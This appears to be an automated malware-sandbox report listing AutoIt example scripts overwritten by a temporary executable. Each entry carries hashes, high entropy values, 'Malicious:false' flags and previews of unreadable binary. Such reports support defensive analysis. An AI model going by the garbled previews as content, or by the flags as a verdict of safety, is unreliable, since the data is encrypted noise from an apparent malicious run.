                                                                                                                                                                                                                                                SHA1:03F194801D96EB7C37A1FA2766E2B8ECFF42577D
                                                                                                                                                                                                                                                SHA-256:B16A4A6EEC3B9A1114C35FC260B7C7D3DD4E7B7C87513EA7A61B87B8DA02A59D
                                                                                                                                                                                                                                                SHA-512:075F338A69C7145571B33F00AA760E246CA3101BC22DD0633258FE5AD4082DE944899E32FC65C2CFB3C92610455DAFE809E4C2DC0F280D27861D7DB4377CCCAA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..q.!O8.H.^)..>...S.&.$<..L.}r.+-...mj..&....-_/....._v........v...x.._..z.....!.9...TS.a.....0...i1.....(.....Ib2F..%........b$....k+9........,yD..U.".tQ.0n.......0.2s.fb..........M.fu....J..6sA.O.\n........a.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..Z.p.)[....{%j...@.p.XK.T.R.M.T........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Random[3].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1126
                                                                                                                                                                                                                                                Entropy (8bit):7.795840706354453
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9tI1piL/qPhRxu3ZsihHo44oC1PhCFJH1jaGJYIsS+WwgHIc0jmksXU4HrkW6tDe:9K1pQ/cVCiP0H1jmJrc0YXUZtwsTQZv
                                                                                                                                                                                                                                                MD5:B83177BD7F55CCAB63EFAFC80EF85495
                                                                                                                                                                                                                                                SHA1:D078CDBDEB60130EB9F5A30C50FF5A88C78A62AD
                                                                                                                                                                                                                                                SHA-256:6A2E93F881DECB8412B44D73712973413E1B5697612043C0DDC9F2CBAE2B6633
                                                                                                                                                                                                                                                SHA-512:5147286E45F9B0BBC55C10857FC57F1F1FCD787D87A808489D66F1B99742811D45A1F69B7FB454EF4469CA0069C4978E531AB0155D30B3E20A86512E9367B2B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..ss.N..au.+Z...8..).y.6.[.D....1..K]d...r.r.....'-.....\.....nq.....b..#..j1..I....!X......!..}[...oT50..,b6GY..b......}.w...j.m......4..jV2...O.....N....'...\..b9.P.'.?.>..G..s....s.txQ...a...]..qZ..p.............H..6.j..#.WtC2..K...\.M..k..r...E.l....vz.I6...<...k.&} ..J........,=V..b .y.Mx./..d..G...h..pnV#...*.o.|....f...*.d...m<!.,.4.v..-...~......0S(..:......p. .M...M..I..%..]e.....Z>..G)h..S.AO./.H....l.S..mf... m....<.t./.d.....=....)....!'.7U&.$......"..~g..z.E..WN.t...i....+....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ReDim.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1005
                                                                                                                                                                                                                                                Entropy (8bit):7.769079103749971
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ocHCqkIZ+jaF7WyyVqdNjmJrc0YXUZtwsTL8E:ocHCqBcR64o0jZtwI8E
                                                                                                                                                                                                                                                MD5:FBE3377B8FB315D0982185368D638979
                                                                                                                                                                                                                                                SHA1:C25A4504089EEF60CA7194C48888EA051BD83F59
                                                                                                                                                                                                                                                SHA-256:92BC973F3DD9E3905E934EE5EE02914C977D29B58F5E6201FD5C88DA5605726E
                                                                                                                                                                                                                                                SHA-512:0DE615B72A9A1341F4ED8A6BFCEA9143273F6EDD9450751C4AB863FC303096AF124EB6FCD9C120CD67A328E7ACF4DDA8A77B1D179025980444ABC1A2EE7F9934
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6.<.....B..z.. ..FF..G..0..q..O..t#.v.(..BS.b...i_.%...u4.4..~.....s.+.o7...j.M..*.(.m..1..]..&."..1.u36.>..>7]uL......w.{......"_c}.iw..L...mgH..i..F~...y.!.1d.[.i..%..HK..v...O )Q.y...1ma.=...8..5...^...3.e^....>@*.m.|P..... ....7..|.......t..P..&...s..5.....3L../..z.k.....o..:...W...B.5C*.~..2kzv?.z...7..^4..d5.}j..{..m.P..s .C..Mu(h.66&"Q.i..N......r.M...zV.w....<..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....H.......0=...d9q.t.?.....<...N{?....................fk.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ReDim[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2311
                                                                                                                                                                                                                                                Entropy (8bit):7.922397806948471
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8XW81xCvUylLv+qGX1YhvBVuyIkWpXM72C/SKUIOVQpl9Wz4o0jZtwa:8GJP9vAX+vBVuAWdoWKUuTlea
                                                                                                                                                                                                                                                MD5:7BDB054641A8E442B5E90CCB994026B4
                                                                                                                                                                                                                                                SHA1:74A5230FC88FE0569EB902AC87F312959D0EA488
                                                                                                                                                                                                                                                SHA-256:7714492167065F9B8BEDCB2CA909225665B23E35E30AA73AA4231D7B8C5BED75
                                                                                                                                                                                                                                                SHA-512:329B89955B684CE73691877B3AEBF37C5520041FA84CB130284FB58EE8ED8B24AC891615DFCA702187C4AAF0B4E53A3FE67E42FA44D4ED2927DAF44A5497D9CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<...4v..!.t..PoQ....h..>.\......1...8|D...K.;{9.Q>A&R.>c..{..?x.v....t=.I(..a.f.#....&..>.n.........)|.il.i?-.5P.r...y.-.}N.&. ].:..HV.'....k.v.z..u...l..../u...U.v..,.H..........nX..~8..a.GX/v...m.i..3h|.r......\C..;H..ZRGA4..|.m...6.&...QR{.s.M.B..:.v. o..)....n.$.>..L...{...o4%.q(.j.y9|...Q...u.....S......?....srrW.= `..R..."..bXH..^YM*..PN. .ZPG.U...r.sL..$.{A....n*%VC]....|>.....-.@..C....I.....I.z.k..l...Y.cAi..H.'..h.i:..%..l%c..$..c?_.1W.|....Jf..=...7..c.83.K_z...Y:P....=m.t9......t....E...\..f....?m+(B6.'.fV...I.....w;*....i....$.&....W..e..6.%..~J#.*....H..!......J...r....y.bUM7.;J..h.7...m..jYS......&....%n&!..!.T...*B...Z...n.l.b.........H.l[...{KK...}z..~=f...a.Ex.Q4..."0./........./..A\;..x...A.hE..o....$h.@..?..?..R.mi.....3.89.N^.E..t..d#.K...j.Pa.f/.a...(.Dw .,{....m.....IK9.>.;.....6...w.L)..c8...g..t.f...Mql\..t#{$EAu.9...K.....~.-#v.......5.*.]LZ..B...(.hL.Q....V.k....~..d.......l......;..kc.\..+....7..y.x.`l.....9..U)Y>.+$.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinList.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1049
                                                                                                                                                                                                                                                Entropy (8bit):7.777013367958103
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wcBowjenRjN1XaYtH0QCgjmJrc0YXUZtwsT45RgvW:wcKjXXa0H0QCu4o0jZtw9eu
                                                                                                                                                                                                                                                MD5:FA214317698BB693E33C204C55FCD978
                                                                                                                                                                                                                                                SHA1:B3EB09BE225DBF0A3809BEFE94A53B61F12C8448
                                                                                                                                                                                                                                                SHA-256:C1C57AB99CE09BBFAED18074BB32B10CE4684E201AF066342692E2B346110A86
                                                                                                                                                                                                                                                SHA-512:2EE6CC083DED10827900F66871940B4BB5E1654F14691E80EA5CC9E157A21248900964E4DBAE049CC709785E35F0C9B1467C100DD9305057AAE9D184B1D063A9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:?...Z.<{r.A......B*......Rs[./...6^-.N.m..%..+.5.X7m.B....Ht.~..h.......6...1....7..0..L....R.0..94u.....E.$.p..+]..../... g%@...m.>.1.F.KYX.....T....m..Oq.Q....o...i-...$.. ....~P7.<.p0..C<..}8.....h..,..d..m....W<+K....."....-...d+.......c..n...2..C.|e..q..}.......x....G.g...@......o.T.|.;+J.....lq....+O..k.i.Iz..h.-..Ph........C.c;-..o.[f.,...rr.....w..a.s...}F.`.....yH.N)....L.@c...B.....%.C.........5.......\fh.S.ut3"?..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...;...p...R...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinList[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key Version 3, Created Tue Nov 19 03:13:33 2030, Unknown Algorithm (0xf4)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                                                Entropy (8bit):7.774421904504526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RK4BhW0+e1y8zw8kNxDKdRajmJrc0YXUZtwsTGsy:MqW12yYw8kTeg4o0jZtwnsy
                                                                                                                                                                                                                                                MD5:658408321602FDBC9E832C126D66B2C3
                                                                                                                                                                                                                                                SHA1:D93748BF6D0238934499E262C0F30432B31E5073
                                                                                                                                                                                                                                                SHA-256:B8E1FEC9F038429BB3CB48994067BE5F848025DC0F83A49F418E8711DF8E407D
                                                                                                                                                                                                                                                SHA-512:0A0879FCD011AC226A26CCA13848F0F4CB44E5B3E68055ACFA9C79E7400E0FE866FEC0BDA38CACCAEE0938DB3750006CC5B5CDB85F02F9E5B784432F71F72ED3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.B.4..r...h......j.......E.7[..7.^o...U...<.@...*#../.%..8$...Z..{*..ea...B)N O.oon..y..D.l..f..q,J<j#-.x\n..%f.....X,....Y.....#..L..)...Mn.phn..N3..r....`<.=-....{.....|..'.*j1.Uud.:[...k.p7W.8:....97Y)..u..@..Lx.....nl...R..H.vJ.;..)={dE./M..4j.(hI?.c.%.E%...C....S..M.h....~.b.s...]..q...i...HW<)'..z..g..T...9.$. ......k..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..<Y.Z;.......d.v..$..c........S.d..V...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinMenuSelectItem.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key Version 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):735
                                                                                                                                                                                                                                                Entropy (8bit):7.714798286865618
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:t+qNHZQS3sjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZYb0ku:VNHWS3sjmJrc0YXUZtwsTEo
                                                                                                                                                                                                                                                MD5:CE9039790833BAD4BCB6817162E903BE
                                                                                                                                                                                                                                                SHA1:88EB72F7F0105359380AF6B96302AB7D98D95C5B
                                                                                                                                                                                                                                                SHA-256:50A300696948A559FD07FCE99D514019572FED349C901004907C0807D04D837E
                                                                                                                                                                                                                                                SHA-512:DC285E7CC41C0C45AB89B07D2F9B69FABFEB0E87E13FC823785C515E4222314AE91F14B83382265E347A3EB1139DE60BC6CDC9EC7893986166BB7335F9EE24BB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.,....<..-.seD.....).dQ.v.wy!...(r?.a..U6W.8..e../..........q[|..TZ:........IY..Q#..x)S.....F..n!<..}B..,c.U.H...-1..VbY...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...Vno.^M..p_........tD..1._.PBw"8.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinMinimizeAll.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):626
                                                                                                                                                                                                                                                Entropy (8bit):7.627683584739235
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:WmdjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZKInku:7jmJrc0YXUZtwsTdn
                                                                                                                                                                                                                                                MD5:0B7AA1FA4FC24556401A36AEF516671A
                                                                                                                                                                                                                                                SHA1:BD8F796B5A268C6C3696553BB2C4258738B39EB5
                                                                                                                                                                                                                                                SHA-256:426BA7D097240992A78AB32436A532760AE72F3AF7C2C08C31CABF34727C1B94
                                                                                                                                                                                                                                                SHA-512:3EFD2C98DAF18B8133EF7767801D60E19972956A5CBFC5F5CEAF54F123F9B16DFFB0542685CA32D189074431762E1A2E35B1799A3E89C5328B0497425B70E4B9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...F4X...4..#ZII.5.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.F.o.@[..b....X}Q........D.]..*Kj(.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinMinimizeAllUndo.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):630
                                                                                                                                                                                                                                                Entropy (8bit):7.606202782480237
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1QGgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ790c1ku:12jmJrc0YXUZtwsTf95t
                                                                                                                                                                                                                                                MD5:06C59C3B637DD20C33EFC7C259ECEDDE
                                                                                                                                                                                                                                                SHA1:3345624047BC47621D0ED24F214834CF7CA6766A
                                                                                                                                                                                                                                                SHA-256:90164C592EC7C0C4F32DA9A3B4874D934032CEA84C2668D4D223DD74AE585931
                                                                                                                                                                                                                                                SHA-512:AD0D3829E85A8184F1F41F2E839EB4031D7C27C8B1C2F350A46C9586F07B36B9D681D1F6A93FC2C948D519B22A4E88BD2C65976AEC9EB9D34E6D01D2D25850BF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....e.JC.>D.O-..G.Z<x.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..F...ZXo6s=+.u.Y......2..\u...+#.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinMove.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1566
                                                                                                                                                                                                                                                Entropy (8bit):7.8641342493012365
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8PVUxF0z3VD9iE13ly+uUXz74o0jZtww9k:8dUPaFDdtl/zAlew6
                                                                                                                                                                                                                                                MD5:F9792AD2E89306F037B737382654D3D1
                                                                                                                                                                                                                                                SHA1:62B6C8E3ACD073071A0F2B3464C6C5DE50A6C08C
                                                                                                                                                                                                                                                SHA-256:4CAE7CB19C33C156AC8C67286CE2B9E14A3D30EE6A0B97729B10B0204AAC69E6
                                                                                                                                                                                                                                                SHA-512:D588E0A443816211B55C679CC76C7AB83BCAB2B0A7FE03B89EA69B0D4D4E2D63EE7659BA6696E61CBFAABD6FA0D068A4FA265E5D4EB8A7549A37974B219FFC0B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...+5E.._4Cx\.....n.5{.....k.*.up../.$.`..Y....8..5...r X....K.&..<1u...".2.......]....<.....i....`q..6,..R......+..0..Q.....{.._u][.......@,T...>.O........&s....n..]z!<H..0...CF........%..E...~z....s...X.^.p..'Z..M..&.....E[...5B0&.1@....".\./`>PMk......L...#."..bF..$.z.~501I.{...{9....t.\8Ul...L5.t..^\..g.Hu0..p.K......D.....:.j....!.'R....y.V.....$.k.H..n...M.0F....!...0F.e<s....0.M....G`....|...k...b.q..7.&Wb.Dj.*..g.....#....YW...Gu......2m...v.3..^.4.g.....?..z9 .:...4....b...^..;..U.7.....jt.'+a..........f^U.r.....9.tb..3.'T...0.....,o=..t&...s.JG7Zj.....#.....j..f<...]../....aT_..S...3..7.H........EK..l..T..b....&....<7...v`..j.k...0.G5.w.............=u.hE...........Z.R....5di..#j......:....M-.dAe.F.P.Q...4^0.'.L./.;$.3.8......~..|..3I.I.G.....o.I..dk...e*^.T..+n............&)F..$..=1..............F..yx/.....}....p`...[.3.s...H..T....L@xn.r..q.[..j;..Tk...!.......ig.......^..7ShR@..M..a........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinSetOnTop.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1070
                                                                                                                                                                                                                                                Entropy (8bit):7.800156941101698
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Lw9wfGg/CJRVRJGfSjjmJrc0YXUZtwsTVRlpey:LtT/C/VRIfSn4o0jZtw6Gy
                                                                                                                                                                                                                                                MD5:A3CAE2009444491CABB1F3BE03EC0BAC
                                                                                                                                                                                                                                                SHA1:4F416FDAD98AD6566FCA765FC0AE032221328725
                                                                                                                                                                                                                                                SHA-256:83F2B353FFA01C040EC4F6F60BF2CA2FCBC808DCF18E0EEAB82EA7555A3D85ED
                                                                                                                                                                                                                                                SHA-512:29A0B53BE3F3468198BCA4CF7DDB2C77CDAC71F451CEB168AFB32C69274039E2D40A2D036B67B95456F102A259CA9C6C11F04079455E5691BDF9A62394AA9D9C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8....t.T.8._.{..[;.TgG....g....!.T.....<.oFw7[.W..~.O..?..y.C.|.Z..if.....=.y..?..=.K.C.....C.r.........U..;..>.h...;.$.6NV.d........A.....3.%..7...D...-.$..M..H.nO%...[.."...t..&......O.|.G..ive..()..7R<g.G. ...........]..k{...q.j..$.L(..V......a2...=......s\...SF.....0h.........[.;SY.u...v..4.......-bM.6.....K.."!d?....$..KBk........b>.&.1.ve.3....t......&?G.r.A.^.1..+..<.!.1T..i..n..I..C&..Q.O.W..\.p'...wKT..O...M..}.<.*$.:u..i..-...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinSetState.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1147
                                                                                                                                                                                                                                                Entropy (8bit):7.822858540246468
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:qoFT5j7R6b26EckHwQlitkgT7jmJrc0YXUZtwsTia:qoFFj7oEnii4/4o0jZtwXa
                                                                                                                                                                                                                                                MD5:6E876DDEE46821AC5D71F2E5E1369FDD
                                                                                                                                                                                                                                                SHA1:30F977E67A322A4F67E94594137638627745B24B
                                                                                                                                                                                                                                                SHA-256:DE06E8F9C5E2D61DC3D37F6F9B9D767759701A06A48A39ECBE7AAA3FDF52DEE4
                                                                                                                                                                                                                                                SHA-512:3A4BB683E55CC3C363C37F8095431E5DA983FEC9422F6FF79F39261B65D5F165C9D984A4F57775EA303DBAB710611B1EB1FBCD6621E80BC2D5BF60EA52E33534
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.(..'...n.E.../......2..I.y..g.. W..H..0.kF..........wK8.t....+4.G....P.{...1..2S. K'.I..G....V+..Q.iK..'B....7ad|J.|.........s'{~..Y......{.......9.......X...<.'...6.N.:.C..2.i{.}.....8.a....<.m..Nb.}kP?..:.8.b...G.Z3.7.....Ml31..c...&.9^=...-.W...e.`H5g9........>...~U.2.idgI..k}.....q......^J..'.z......u......2.Q.a.q......':^....Z.T#..>p..{.H.}..R...I.<qB.Y~m.6H'....t......;..I..O...kO...+..,..v....S...`.....A.#...?.[..*.\U...".....U...sG..B.[.(...=/X.c"^q.jN.m....#..bK.6...j=.......l.Z...R..&.L..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinSetTitle.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1107
                                                                                                                                                                                                                                                Entropy (8bit):7.8106297250796395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mH83MtpIGJlzuwQJxtjmJrc0YXUZtwsTc:+88tGGJlzuw2x14o0jZtwP
                                                                                                                                                                                                                                                MD5:A4A67CCEC1E0E93E46638E14C45C8D2E
                                                                                                                                                                                                                                                SHA1:345433938BD6C9A00DDED7C4E12EDCF926AF7AC3
                                                                                                                                                                                                                                                SHA-256:10426B609D6C66E55BEF1ED49CE3765DCF559B35CA9FA0C66AE3C86470A091DC
                                                                                                                                                                                                                                                SHA-512:4AFD0BA595BAA96363B93D39B4DA2C59A8F370EFB55E5F71647BA5707066FE41018BEA860051F80481C44320B7651BD989D6DDF60194EACD0E97C70F3FBAF89E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
